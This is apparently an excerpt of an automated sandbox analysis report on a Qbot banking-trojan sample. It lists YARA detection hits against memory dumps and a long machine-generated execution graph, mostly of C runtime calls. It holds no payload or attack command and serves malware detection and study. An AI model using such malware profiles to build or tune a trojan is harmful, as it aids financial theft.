            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000000.319924513.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Qbot_92c67a6d, Description: unknown, Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Qbot_3074a8d4, Description: unknown, Source: 00000009.00000002.322491943.0000000000E00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown


              Execution Graph

              Execution Coverage:1.5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:2.9%
              Total number of Nodes:2000
              Total number of Limit Nodes:16
calls 16481->16483 16481->16484 16482->16481 16483->16484 16484->16444 16486 6da9a8ea 16485->16486 16490 6da9a909 16485->16490 16486->16490 16491 6da9b458 16486->16491 16489 6da94760 ___free_lconv_mon 14 API calls 16489->16490 16490->16428 16492 6da9a903 16491->16492 16493 6da9b469 16491->16493 16492->16489 16527 6da9b1b7 16493->16527 16496 6da9b1b7 __Getctype 14 API calls 16497 6da9b47c 16496->16497 16498 6da9b1b7 __Getctype 14 API calls 16497->16498 16499 6da9b487 16498->16499 16500 6da9b1b7 __Getctype 14 API calls 16499->16500 16501 6da9b492 16500->16501 16502 6da9b1b7 __Getctype 14 API calls 16501->16502 16503 6da9b4a0 16502->16503 16504 6da94760 ___free_lconv_mon 14 API calls 16503->16504 16505 6da9b4ab 16504->16505 16506 6da94760 ___free_lconv_mon 14 API calls 16505->16506 16507 6da9b4b6 16506->16507 16508 6da94760 ___free_lconv_mon 14 API calls 16507->16508 16509 6da9b4c1 16508->16509 16510 6da9b1b7 __Getctype 14 API calls 16509->16510 16511 6da9b4cf 16510->16511 16512 6da9b1b7 __Getctype 14 API calls 16511->16512 16513 6da9b4dd 16512->16513 16514 6da9b1b7 __Getctype 14 API calls 16513->16514 16515 6da9b4ee 16514->16515 16516 6da9b1b7 __Getctype 14 API calls 16515->16516 16517 6da9b4fc 16516->16517 16518 6da9b1b7 __Getctype 14 API calls 16517->16518 16519 6da9b50a 16518->16519 16520 6da94760 ___free_lconv_mon 14 API calls 16519->16520 16521 6da9b515 16520->16521 16522 6da94760 ___free_lconv_mon 14 API calls 16521->16522 16523 6da9b520 16522->16523 16524 6da94760 ___free_lconv_mon 14 API calls 16523->16524 16525 6da9b52b 16524->16525 16526 6da94760 ___free_lconv_mon 14 API calls 16525->16526 16526->16492 16528 6da9b1c9 16527->16528 16529 6da9b1d8 16528->16529 16530 6da94760 ___free_lconv_mon 14 API calls 16528->16530 16529->16496 16530->16528 16531->16416 16571 6da98bff 16532->16571 16535 6da98d12 16536 6da98d1e ___scrt_is_nonwritable_in_current_image 16535->16536 16537 6da92d2d __dosmaperr 14 API calls 16536->16537 16542 6da98d4b IsInExceptionSpec 
16536->16542 16545 6da98d45 IsInExceptionSpec 16536->16545 16537->16545 16538 6da98d92 16540 6da90403 __dosmaperr 14 API calls 16538->16540 16539 6da98d7c 16539->16328 16541 6da98d97 16540->16541 16582 6da8dabf 16541->16582 16544 6da98dbe 16542->16544 16585 6da8fb12 RtlEnterCriticalSection 16542->16585 16548 6da98ef1 16544->16548 16549 6da98e00 16544->16549 16560 6da98e2f 16544->16560 16545->16538 16545->16539 16545->16542 16550 6da98efc 16548->16550 16617 6da8fb5a RtlLeaveCriticalSection 16548->16617 16549->16560 16586 6da92bdc GetLastError 16549->16586 16553 6da916d2 IsInExceptionSpec 23 API calls 16550->16553 16555 6da98f04 16553->16555 16557 6da92bdc __Getctype 41 API calls 16558 6da98e84 16557->16558 16558->16539 16561 6da92bdc __Getctype 41 API calls 16558->16561 16559 6da92bdc __Getctype 41 API calls 16559->16560 16613 6da98e9e 16560->16613 16561->16539 16563 6da8d8df IsInExceptionSpec 16562->16563 16564 6da8d90b IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16563->16564 16567 6da8d9dc IsInExceptionSpec 16564->16567 16566 6da8d9fa 16566->16335 16682 6da89b91 16567->16682 16690 6da91505 16568->16690 16572 6da98c0b ___scrt_is_nonwritable_in_current_image 16571->16572 16577 6da8fb12 RtlEnterCriticalSection 16572->16577 16574 6da98c19 16578 6da98c57 16574->16578 16577->16574 16581 6da8fb5a RtlLeaveCriticalSection 16578->16581 16580 6da90bfe 16580->16328 16580->16535 16581->16580 16618 6da8da0b 16582->16618 16585->16544 16587 6da92bf8 16586->16587 16588 6da92bf2 16586->16588 16589 6da967d0 __Getctype 6 API calls 16587->16589 16592 6da92bfc SetLastError 16587->16592 16590 6da96791 __Getctype 6 API calls 16588->16590 16591 6da92c14 16589->16591 16590->16587 16591->16592 16594 6da9479a __Getctype 14 API calls 16591->16594 16596 6da92c8c 16592->16596 16597 6da92c91 16592->16597 16595 6da92c29 16594->16595 16598 6da92c31 16595->16598 16599 6da92c42 16595->16599 16596->16559 16600 6da90bf9 IsInExceptionSpec 39 API calls 16597->16600 16601 
6da967d0 __Getctype 6 API calls 16598->16601 16602 6da967d0 __Getctype 6 API calls 16599->16602 16603 6da92c96 16600->16603 16611 6da92c3f 16601->16611 16604 6da92c4e 16602->16604 16605 6da92c69 16604->16605 16606 6da92c52 16604->16606 16608 6da929de __Getctype 14 API calls 16605->16608 16609 6da967d0 __Getctype 6 API calls 16606->16609 16607 6da94760 ___free_lconv_mon 14 API calls 16607->16592 16610 6da92c74 16608->16610 16609->16611 16612 6da94760 ___free_lconv_mon 14 API calls 16610->16612 16611->16607 16612->16592 16614 6da98e75 16613->16614 16615 6da98ea4 16613->16615 16614->16539 16614->16557 16614->16558 16681 6da8fb5a RtlLeaveCriticalSection 16615->16681 16617->16550 16619 6da8da1d ___std_exception_copy 16618->16619 16624 6da8da42 16619->16624 16621 6da8da35 16635 6da8d7fb 16621->16635 16625 6da8da59 16624->16625 16626 6da8da52 16624->16626 16629 6da8da67 16625->16629 16645 6da8d837 16625->16645 16641 6da8d860 GetLastError 16626->16641 16629->16621 16630 6da8da8e 16630->16629 16648 6da8daec IsProcessorFeaturePresent 16630->16648 16632 6da8dabe 16633 6da8da0b ___std_exception_copy 41 API calls 16632->16633 16634 6da8dacb 16633->16634 16634->16621 16636 6da8d807 16635->16636 16638 6da8d81e 16636->16638 16674 6da8d8a6 16636->16674 16639 6da8d8a6 ___std_exception_copy 41 API calls 16638->16639 16640 6da8d831 16638->16640 16639->16640 16640->16539 16642 6da8d879 16641->16642 16652 6da92dde 16642->16652 16646 6da8d85b 16645->16646 16647 6da8d842 GetLastError SetLastError 16645->16647 16646->16630 16647->16630 16649 6da8daf8 16648->16649 16650 6da8d8c3 IsInExceptionSpec 8 API calls 16649->16650 16651 6da8db0d GetCurrentProcess TerminateProcess 16650->16651 16651->16632 16653 6da92df1 16652->16653 16656 6da92df7 16652->16656 16654 6da96791 __Getctype 6 API calls 16653->16654 16654->16656 16655 6da967d0 __Getctype 6 API calls 16657 6da92e11 16655->16657 16656->16655 16673 6da8d891 SetLastError 16656->16673 16658 6da9479a __Getctype 14 API calls 16657->16658 
16657->16673 16659 6da92e21 16658->16659 16660 6da92e29 16659->16660 16661 6da92e3e 16659->16661 16662 6da967d0 __Getctype 6 API calls 16660->16662 16663 6da967d0 __Getctype 6 API calls 16661->16663 16664 6da92e35 16662->16664 16665 6da92e4a 16663->16665 16668 6da94760 ___free_lconv_mon 14 API calls 16664->16668 16666 6da92e5d 16665->16666 16667 6da92e4e 16665->16667 16670 6da929de __Getctype 14 API calls 16666->16670 16669 6da967d0 __Getctype 6 API calls 16667->16669 16668->16673 16669->16664 16671 6da92e68 16670->16671 16672 6da94760 ___free_lconv_mon 14 API calls 16671->16672 16672->16673 16673->16625 16675 6da8d8b9 16674->16675 16676 6da8d8b0 16674->16676 16675->16638 16677 6da8d860 ___std_exception_copy 16 API calls 16676->16677 16678 6da8d8b5 16677->16678 16678->16675 16679 6da90bf9 IsInExceptionSpec 41 API calls 16678->16679 16680 6da8d8c2 16679->16680 16681->16614 16683 6da89b99 16682->16683 16684 6da89b9a IsProcessorFeaturePresent 16682->16684 16683->16566 16686 6da8a15a 16684->16686 16689 6da8a11d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16686->16689 16688 6da8a23d 16688->16566 16689->16688 16691 6da91532 16690->16691 16692 6da91543 16690->16692 16701 6da915cd GetModuleHandleW 16691->16701 16708 6da913cd 16692->16708 16697 6da90c3c 16702 6da91537 16701->16702 16702->16692 16703 6da91632 GetModuleHandleExW 16702->16703 16704 6da91671 GetProcAddress 16703->16704 16705 6da91685 16703->16705 16704->16705 16706 6da91698 FreeLibrary 16705->16706 16707 6da916a1 16705->16707 16706->16707 16707->16692 16709 6da913d9 ___scrt_is_nonwritable_in_current_image 16708->16709 16723 6da8fb12 RtlEnterCriticalSection 16709->16723 16711 6da913e3 16724 6da9141a 16711->16724 16713 6da913f0 16728 6da9140e 16713->16728 16716 6da9159c 16752 6da91610 16716->16752 16719 6da915ba 16721 6da91632 IsInExceptionSpec 3 API calls 16719->16721 16720 6da915aa GetCurrentProcess TerminateProcess 16720->16719 16722 6da915c2 ExitProcess 16721->16722 
16723->16711 16725 6da91426 ___scrt_is_nonwritable_in_current_image 16724->16725 16727 6da9148d IsInExceptionSpec 16725->16727 16731 6da91eb8 16725->16731 16727->16713 16751 6da8fb5a RtlLeaveCriticalSection 16728->16751 16730 6da913fc 16730->16697 16730->16716 16732 6da91ec4 __EH_prolog3 16731->16732 16735 6da91bf1 16732->16735 16734 6da91eeb std::locale::_Init 16734->16727 16736 6da91bfd ___scrt_is_nonwritable_in_current_image 16735->16736 16743 6da8fb12 RtlEnterCriticalSection 16736->16743 16738 6da91c0b 16744 6da91dc8 16738->16744 16743->16738 16745 6da91c18 16744->16745 16746 6da91de7 16744->16746 16748 6da91c40 16745->16748 16746->16745 16747 6da94760 ___free_lconv_mon 14 API calls 16746->16747 16747->16745 16749 6da8fb5a std::_Lockit::~_Lockit RtlLeaveCriticalSection 16748->16749 16750 6da91c29 16749->16750 16750->16734 16751->16730 16757 6da99229 GetPEB 16752->16757 16755 6da9161a GetPEB 16756 6da915a6 16755->16756 16756->16719 16756->16720 16758 6da99243 16757->16758 16759 6da91615 16757->16759 16761 6da96660 16758->16761 16759->16755 16759->16756 16762 6da965dd std::_Lockit::_Lockit 5 API calls 16761->16762 16763 6da9667c 16762->16763 16763->16759 16765 6da99e72 ___scrt_is_nonwritable_in_current_image 16764->16765 16766 6da99e8c 16765->16766 16808 6da8fb12 RtlEnterCriticalSection 16765->16808 16769 6da99d3b 16766->16769 16771 6da90bf9 IsInExceptionSpec 41 API calls 16766->16771 16768 6da99ec8 16809 6da99ee5 16768->16809 16775 6da99a91 16769->16775 16773 6da99f05 16771->16773 16772 6da99e9c 16772->16768 16774 6da94760 ___free_lconv_mon 14 API calls 16772->16774 16774->16768 16813 6da90416 16775->16813 16778 6da99ab2 GetOEMCP 16780 6da99adb 16778->16780 16779 6da99ac4 16779->16780 16781 6da99ac9 GetACP 16779->16781 16780->16292 16782 6da9458b 16780->16782 16781->16780 16783 6da945c9 16782->16783 16787 6da94599 __Getctype 16782->16787 16784 6da90403 __dosmaperr 14 API calls 16783->16784 16786 6da945c7 16784->16786 16785 6da945b4 RtlAllocateHeap 16785->16786 
16785->16787 16786->16287 16786->16288 16787->16783 16787->16785 16788 6da911a2 std::_Facet_Register 2 API calls 16787->16788 16788->16787 16790 6da99a91 43 API calls 16789->16790 16791 6da99f81 16790->16791 16793 6da99fbe IsValidCodePage 16791->16793 16797 6da99ffa IsInExceptionSpec 16791->16797 16792 6da89b91 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16794 6da99da8 16792->16794 16795 6da99fd0 16793->16795 16793->16797 16794->16293 16794->16299 16796 6da99fff GetCPInfo 16795->16796 16799 6da99fd9 IsInExceptionSpec 16795->16799 16796->16797 16796->16799 16797->16792 16856 6da99b65 16799->16856 16801 6da9998f ___scrt_is_nonwritable_in_current_image 16800->16801 16943 6da8fb12 RtlEnterCriticalSection 16801->16943 16803 6da99999 16944 6da999d0 16803->16944 16808->16772 16812 6da8fb5a RtlLeaveCriticalSection 16809->16812 16811 6da99eec 16811->16766 16812->16811 16814 6da9042d 16813->16814 16815 6da90434 16813->16815 16814->16778 16814->16779 16815->16814 16816 6da92bdc __Getctype 41 API calls 16815->16816 16817 6da90455 16816->16817 16821 6da946a4 16817->16821 16822 6da946b7 16821->16822 16824 6da9046b 16821->16824 16822->16824 16829 6da9a9b8 16822->16829 16825 6da94702 16824->16825 16826 6da9472a 16825->16826 16827 6da94715 16825->16827 16826->16814 16827->16826 16851 6da99f4e 16827->16851 16830 6da9a9c4 ___scrt_is_nonwritable_in_current_image 16829->16830 16831 6da92bdc __Getctype 41 API calls 16830->16831 16832 6da9a9cd 16831->16832 16833 6da9aa13 16832->16833 16842 6da8fb12 RtlEnterCriticalSection 16832->16842 16833->16824 16835 6da9a9eb 16843 6da9aa39 16835->16843 16840 6da90bf9 IsInExceptionSpec 41 API calls 16841 6da9aa38 16840->16841 16842->16835 16844 6da9a9fc 16843->16844 16845 6da9aa47 __Getctype 16843->16845 16847 6da9aa18 16844->16847 16845->16844 16846 6da9a76c __Getctype 14 API calls 16845->16846 16846->16844 16850 6da8fb5a RtlLeaveCriticalSection 16847->16850 16849 6da9aa0f 16849->16833 16849->16840 16850->16849 16852 
6da92bdc __Getctype 41 API calls 16851->16852 16853 6da99f53 16852->16853 16854 6da99e66 std::_Locinfo::_Locinfo_dtor 41 API calls 16853->16854 16855 6da99f5e 16854->16855 16855->16826 16857 6da99b8d GetCPInfo 16856->16857 16866 6da99c56 16856->16866 16858 6da99ba5 16857->16858 16857->16866 16867 6da973ab 16858->16867 16860 6da89b91 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16861 6da99d0f 16860->16861 16861->16797 16865 6da976a2 45 API calls 16865->16866 16866->16860 16868 6da90416 std::_Locinfo::_Locinfo_dtor 41 API calls 16867->16868 16869 6da973cb 16868->16869 16887 6da98f05 16869->16887 16871 6da973f8 16872 6da97487 16871->16872 16873 6da9748f 16871->16873 16876 6da9458b std::_Locinfo::_Locinfo_dtor 15 API calls 16871->16876 16878 6da9741d IsInExceptionSpec __alloca_probe_16 16871->16878 16890 6da8937b 16872->16890 16874 6da89b91 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16873->16874 16877 6da974b2 16874->16877 16876->16878 16882 6da976a2 16877->16882 16878->16872 16879 6da98f05 std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 16878->16879 16880 6da97468 16879->16880 16880->16872 16881 6da97473 GetStringTypeW 16880->16881 16881->16872 16883 6da90416 std::_Locinfo::_Locinfo_dtor 41 API calls 16882->16883 16884 6da976b5 16883->16884 16897 6da974b4 16884->16897 16889 6da98f16 MultiByteToWideChar 16887->16889 16889->16871 16891 6da89385 16890->16891 16892 6da89396 16890->16892 16891->16892 16894 6da8dcf4 16891->16894 16892->16873 16895 6da94760 ___free_lconv_mon 14 API calls 16894->16895 16896 6da8dd0c 16895->16896 16896->16892 16898 6da974cf 16897->16898 16899 6da98f05 std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 16898->16899 16903 6da97515 16899->16903 16900 6da9768d 16901 6da89b91 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 16900->16901 16902 6da976a0 16901->16902 16902->16865 16903->16900 16904 6da9458b std::_Locinfo::_Locinfo_dtor 15 API calls 16903->16904 16906 6da9753b 
__alloca_probe_16 16903->16906 16913 6da975c1 16903->16913 16904->16906 16905 6da8937b __freea 14 API calls 16905->16900 16907 6da98f05 std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 16906->16907 16906->16913 16908 6da97580 16907->16908 16908->16913 16925 6da9694f 16908->16925 16911 6da975ea 16914 6da97675 16911->16914 16915 6da9458b std::_Locinfo::_Locinfo_dtor 15 API calls 16911->16915 16918 6da975fc __alloca_probe_16 16911->16918 16912 6da975b2 16912->16913 16917 6da9694f std::_Locinfo::_Locinfo_dtor 6 API calls 16912->16917 16913->16905 16916 6da8937b __freea 14 API calls 16914->16916 16915->16918 16916->16913 16917->16913 16918->16914 16919 6da9694f std::_Locinfo::_Locinfo_dtor 6 API calls 16918->16919 16920 6da9763f 16919->16920 16920->16914 16931 6da98f81 16920->16931 16922 6da97659 16922->16914 16923 6da97662 16922->16923 16924 6da8937b __freea 14 API calls 16923->16924 16924->16913 16934 6da964de 16925->16934 16929 6da969a0 LCMapStringW 16930 6da96960 16929->16930 16930->16911 16930->16912 16930->16913 16932 6da98f98 WideCharToMultiByte 16931->16932 16932->16922 16935 6da965dd std::_Lockit::_Lockit 5 API calls 16934->16935 16936 6da964f4 16935->16936 16936->16930 16937 6da969ac 16936->16937 16940 6da964f8 16937->16940 16939 6da969b7 std::_Locinfo::_Locinfo_dtor 16939->16929 16941 6da965dd std::_Lockit::_Lockit 5 API calls 16940->16941 16942 6da9650e 16941->16942 16942->16939 16943->16803 16954 6da90928 16944->16954 16946 6da999f2 16947 6da90928 41 API calls 16946->16947 16948 6da99a11 16947->16948 16949 6da999a6 16948->16949 16950 6da94760 ___free_lconv_mon 14 API calls 16948->16950 16951 6da999c4 16949->16951 16950->16949 16968 6da8fb5a RtlLeaveCriticalSection 16951->16968 16953 6da999b2 16953->16297 16955 6da90939 16954->16955 16959 6da90935 _Yarn 16954->16959 16956 6da90940 16955->16956 16961 6da90953 IsInExceptionSpec 16955->16961 16957 6da90403 __dosmaperr 14 API calls 16956->16957 16958 6da90945 16957->16958 16960 6da8dabf ___std_exception_copy 41 
API calls 16958->16960 16959->16946 16960->16959 16961->16959 16962 6da9098a 16961->16962 16963 6da90981 16961->16963 16962->16959 16966 6da90403 __dosmaperr 14 API calls 16962->16966 16964 6da90403 __dosmaperr 14 API calls 16963->16964 16965 6da90986 16964->16965 16967 6da8dabf ___std_exception_copy 41 API calls 16965->16967 16966->16965 16967->16959 16968->16953 16970 6da9211e 16969->16970 16972 6da9212c 16969->16972 16970->16972 16976 6da92144 16970->16976 16971 6da90403 __dosmaperr 14 API calls 16973 6da92134 16971->16973 16972->16971 16974 6da8dabf ___std_exception_copy 41 API calls 16973->16974 16975 6da9213e 16974->16975 16975->16246 16976->16975 16977 6da90403 __dosmaperr 14 API calls 16976->16977 16977->16973 16982 6da91b43 16978->16982 16983 6da91b14 16978->16983 16979 6da91b5a 16981 6da94760 ___free_lconv_mon 14 API calls 16979->16981 16980 6da94760 ___free_lconv_mon 14 API calls 16980->16982 16981->16983 16982->16979 16982->16980 16983->16247 17193 6da8982e 17194 6da89839 17193->17194 17195 6da8986c 17193->17195 17197 6da8985e 17194->17197 17198 6da8983e 17194->17198 17196 6da89988 __DllMainCRTStartup@12 89 API calls 17195->17196 17204 6da89848 17196->17204 17205 6da89881 17197->17205 17200 6da89843 17198->17200 17201 6da89854 17198->17201 17200->17204 17219 6da895e2 17200->17219 17224 6da895c3 17201->17224 17206 6da8988d ___scrt_is_nonwritable_in_current_image 17205->17206 17232 6da89653 17206->17232 17208 6da89894 __DllMainCRTStartup@12 17209 6da898bb 17208->17209 17210 6da89980 17208->17210 17218 6da898f7 ___scrt_is_nonwritable_in_current_image IsInExceptionSpec 17208->17218 17243 6da895b5 17209->17243 17211 6da89ec6 __DllMainCRTStartup@12 4 API calls 17210->17211 17213 6da89987 17211->17213 17214 6da898ca __RTC_Initialize 17214->17218 17246 6da8a084 RtlInitializeSListHead 17214->17246 17216 6da898d8 17216->17218 17247 6da8958a 17216->17247 17218->17204 17308 6da9206d 17219->17308 17397 6da8c37d 17224->17397 17227 6da895cc 17227->17204 17230 6da895df 
17230->17204 17231 6da8c388 21 API calls 17231->17227 17233 6da8965c 17232->17233 17251 6da89ce5 IsProcessorFeaturePresent 17233->17251 17237 6da8966d 17238 6da89671 17237->17238 17261 6da92050 17237->17261 17238->17208 17241 6da89688 17241->17208 17242 6da8c393 ___scrt_uninitialize_crt 7 API calls 17242->17238 17302 6da8968c 17243->17302 17245 6da895bc 17245->17214 17246->17216 17248 6da8958f ___scrt_release_startup_lock 17247->17248 17249 6da89ce5 IsProcessorFeaturePresent 17248->17249 17250 6da89598 17248->17250 17249->17250 17250->17218 17252 6da89668 17251->17252 17253 6da8c35e 17252->17253 17264 6da8d4a7 17253->17264 17256 6da8c367 17256->17237 17258 6da8c36f 17259 6da8c37a 17258->17259 17260 6da8d4e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 17258->17260 17259->17237 17260->17256 17293 6da9a349 17261->17293 17265 6da8d4b0 17264->17265 17267 6da8d4d9 17265->17267 17269 6da8c363 17265->17269 17278 6da8d6e4 17265->17278 17268 6da8d4e3 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 17267->17268 17268->17269 17269->17256 17270 6da8c53a 17269->17270 17283 6da8d5f5 17270->17283 17273 6da8c54f 17273->17258 17276 6da8c56a 17276->17258 17277 6da8c56d ___vcrt_uninitialize_ptd 6 API calls 17277->17273 17279 6da8d5ac ___vcrt_FlsFree 5 API calls 17278->17279 17280 6da8d6fe 17279->17280 17281 6da8d71c InitializeCriticalSectionAndSpinCount 17280->17281 17282 6da8d707 17280->17282 17281->17282 17282->17265 17284 6da8d5ac ___vcrt_FlsFree 5 API calls 17283->17284 17285 6da8d60f 17284->17285 17286 6da8d628 TlsAlloc 17285->17286 17287 6da8c544 17285->17287 17287->17273 17288 6da8d6a6 17287->17288 17289 6da8d5ac ___vcrt_FlsFree 5 API calls 17288->17289 17290 6da8d6c0 17289->17290 17291 6da8d6db TlsSetValue 17290->17291 17292 6da8c55d 17290->17292 17291->17292 17292->17276 17292->17277 17294 6da9a359 17293->17294 17295 6da8967a 17293->17295 17294->17295 17297 6da9580c 17294->17297 17295->17241 17295->17242 17298 6da95813 17297->17298 17299 6da95856 GetStdHandle 
17298->17299 17300 6da958b8 17298->17300 17301 6da95869 GetFileType 17298->17301 17299->17298 17300->17294 17301->17298 17303 6da89698 17302->17303 17304 6da8969c 17302->17304 17303->17245 17305 6da896a9 ___scrt_release_startup_lock 17304->17305 17306 6da89ec6 __DllMainCRTStartup@12 4 API calls 17304->17306 17305->17245 17307 6da89712 17306->17307 17314 6da92bb0 17308->17314 17311 6da8c388 17380 6da8c42d 17311->17380 17315 6da895e7 17314->17315 17316 6da92bba 17314->17316 17315->17311 17317 6da96791 __Getctype 6 API calls 17316->17317 17318 6da92bc1 17317->17318 17318->17315 17319 6da967d0 __Getctype 6 API calls 17318->17319 17320 6da92bd4 17319->17320 17322 6da92a77 17320->17322 17323 6da92a82 17322->17323 17324 6da92a92 17322->17324 17328 6da92a98 17323->17328 17324->17315 17327 6da94760 ___free_lconv_mon 14 API calls 17327->17324 17329 6da92aad 17328->17329 17330 6da92ab3 17328->17330 17332 6da94760 ___free_lconv_mon 14 API calls 17329->17332 17331 6da94760 ___free_lconv_mon 14 API calls 17330->17331 17333 6da92abf 17331->17333 17332->17330 17334 6da94760 ___free_lconv_mon 14 API calls 17333->17334 17335 6da92aca 17334->17335 17336 6da94760 ___free_lconv_mon 14 API calls 17335->17336 17337 6da92ad5 17336->17337 17338 6da94760 ___free_lconv_mon 14 API calls 17337->17338 17339 6da92ae0 17338->17339 17340 6da94760 ___free_lconv_mon 14 API calls 17339->17340 17341 6da92aeb 17340->17341 17342 6da94760 ___free_lconv_mon 14 API calls 17341->17342 17343 6da92af6 17342->17343 17344 6da94760 ___free_lconv_mon 14 API calls 17343->17344 17345 6da92b01 17344->17345 17346 6da94760 ___free_lconv_mon 14 API calls 17345->17346 17347 6da92b0c 17346->17347 17348 6da94760 ___free_lconv_mon 14 API calls 17347->17348 17349 6da92b1a 17348->17349 17354 6da928c4 17349->17354 17355 6da928d0 ___scrt_is_nonwritable_in_current_image 17354->17355 17370 6da8fb12 RtlEnterCriticalSection 17355->17370 17357 6da928da 17360 6da94760 ___free_lconv_mon 14 API calls 17357->17360 17361 6da92904 
17357->17361 17360->17361 17371 6da92923 17361->17371 17362 6da9292f 17363 6da9293b ___scrt_is_nonwritable_in_current_image 17362->17363 17375 6da8fb12 RtlEnterCriticalSection 17363->17375 17365 6da92945 17366 6da92b65 __Getctype 14 API calls 17365->17366 17367 6da92958 17366->17367 17376 6da92978 17367->17376 17370->17357 17374 6da8fb5a RtlLeaveCriticalSection 17371->17374 17373 6da92911 17373->17362 17374->17373 17375->17365 17379 6da8fb5a RtlLeaveCriticalSection 17376->17379 17378 6da92966 17378->17327 17379->17378 17381 6da8c43a 17380->17381 17382 6da895ec 17380->17382 17383 6da8c448 17381->17383 17388 6da8d66b 17381->17388 17382->17204 17384 6da8d6a6 ___vcrt_FlsSetValue 6 API calls 17383->17384 17386 6da8c458 17384->17386 17393 6da8c411 17386->17393 17389 6da8d5ac ___vcrt_FlsFree 5 API calls 17388->17389 17390 6da8d685 17389->17390 17391 6da8d69d TlsGetValue 17390->17391 17392 6da8d691 17390->17392 17391->17392 17392->17383 17394 6da8c428 17393->17394 17395 6da8c41b 17393->17395 17394->17382 17395->17394 17396 6da8dcf4 ___vcrt_freefls@4 14 API calls 17395->17396 17396->17394 17403 6da8c471 17397->17403 17399 6da895c8 17399->17227 17400 6da92062 17399->17400 17401 6da92d2d __dosmaperr 14 API calls 17400->17401 17402 6da895d4 17401->17402 17402->17230 17402->17231 17404 6da8c47a 17403->17404 17405 6da8c47d GetLastError 17403->17405 17404->17399 17406 6da8d66b ___vcrt_FlsGetValue 6 API calls 17405->17406 17407 6da8c492 17406->17407 17408 6da8c4b1 17407->17408 17409 6da8c4f7 SetLastError 17407->17409 17410 6da8d6a6 ___vcrt_FlsSetValue 6 API calls 17407->17410 17408->17409 17409->17399 17411 6da8c4ab __Getctype 17410->17411 17411->17408 17412 6da8c4d3 17411->17412 17414 6da8d6a6 ___vcrt_FlsSetValue 6 API calls 17411->17414 17413 6da8d6a6 ___vcrt_FlsSetValue 6 API calls 17412->17413 17415 6da8c4e7 17412->17415 17413->17415 17414->17412 17416 6da8dcf4 ___vcrt_freefls@4 14 API calls 17415->17416 17416->17408 17417 6da86510 18148 6da81770 17417->18148 17419 6da8655d 
17420 6da81770 43 API calls 17419->17420 17421 6da8658d 17420->17421 17422 6da81770 43 API calls 17421->17422 17423 6da865bd 17422->17423 17424 6da81770 43 API calls 17423->17424 17425 6da865ed 17424->17425 17426 6da81770 43 API calls 17425->17426 17427 6da8661d 17426->17427 17428 6da81770 43 API calls 17427->17428 17429 6da8664d 17428->17429 17430 6da81770 43 API calls 17429->17430 17431 6da8667d 17430->17431 17432 6da81770 43 API calls 17431->17432 17433 6da866ad 17432->17433 17434 6da81770 43 API calls 17433->17434 17435 6da866dd 17434->17435 17436 6da81770 43 API calls 17435->17436 17437 6da86707 17436->17437 17438 6da81770 43 API calls 17437->17438 17439 6da8672b 17438->17439 17440 6da81770 43 API calls 17439->17440 17441 6da8674f 17440->17441 17442 6da81770 43 API calls 17441->17442 17443 6da86773 17442->17443 18163 6da88590 17443->18163 17445 6da8678a 17446 6da81770 43 API calls 17445->17446 17447 6da867cf 17446->17447 17448 6da81770 43 API calls 17447->17448 17449 6da867ff 17448->17449 17450 6da81770 43 API calls 17449->17450 17451 6da8682f 17450->17451 17452 6da81770 43 API calls 17451->17452 17453 6da8685f 17452->17453 17454 6da81770 43 API calls 17453->17454 17455 6da8688f 17454->17455 17456 6da81770 43 API calls 17455->17456 17457 6da868bf 17456->17457 17458 6da81770 43 API calls 17457->17458 17459 6da868ef 17458->17459 17460 6da81770 43 API calls 17459->17460 17461 6da8691f 17460->17461 17462 6da81770 43 API calls 17461->17462 17463 6da8694f 17462->17463 17464 6da81770 43 API calls 17463->17464 17465 6da8697f 17464->17465 17466 6da81770 43 API calls 17465->17466 17467 6da869af 17466->17467 17468 6da81770 43 API calls 17467->17468 17469 6da869df 17468->17469 17470 6da81770 43 API calls 17469->17470 17471 6da86a09 17470->17471 17472 6da81770 43 API calls 17471->17472 17473 6da86a2d 17472->17473 17474 6da81770 43 API calls 17473->17474 17475 6da86a51 17474->17475 17476 6da81770 43 API calls 17475->17476 17477 6da86a75 17476->17477 17478 6da88590 43 API 
calls 17477->17478 17479 6da86a8c 17478->17479 18189 6da814d0 17479->18189 17481 6da86aa9 18206 6da820d0 17481->18206 17483 6da86ab4 17484 6da86ade std::ios_base::_Ios_base_dtor 17483->17484 17486 6da87d39 17483->17486 17485 6da81770 43 API calls 17484->17485 17487 6da86b21 17485->17487 18260 6da8dacf 17486->18260 18211 6da82160 17487->18211 17490 6da87d3e 17491 6da8dacf 41 API calls 17490->17491 17492 6da87d43 17491->17492 17496 6da81770 43 API calls 17492->17496 17493 6da81770 43 API calls 17494 6da86b87 17493->17494 17498 6da82160 43 API calls 17494->17498 17506 6da86b8f std::ios_base::_Ios_base_dtor 17494->17506 17495 6da86b2f std::ios_base::_Ios_base_dtor 17495->17490 17495->17493 17497 6da87d91 17496->17497 17499 6da81770 43 API calls 17497->17499 17498->17506 17502 6da87dc5 17499->17502 17500 6da81770 43 API calls 17501 6da86c24 17500->17501 17504 6da82160 43 API calls 17501->17504 17513 6da86c29 std::ios_base::_Ios_base_dtor 17501->17513 17503 6da81770 43 API calls 17502->17503 17505 6da87df9 17503->17505 17504->17513 17507 6da81770 43 API calls 17505->17507 17506->17490 17506->17500 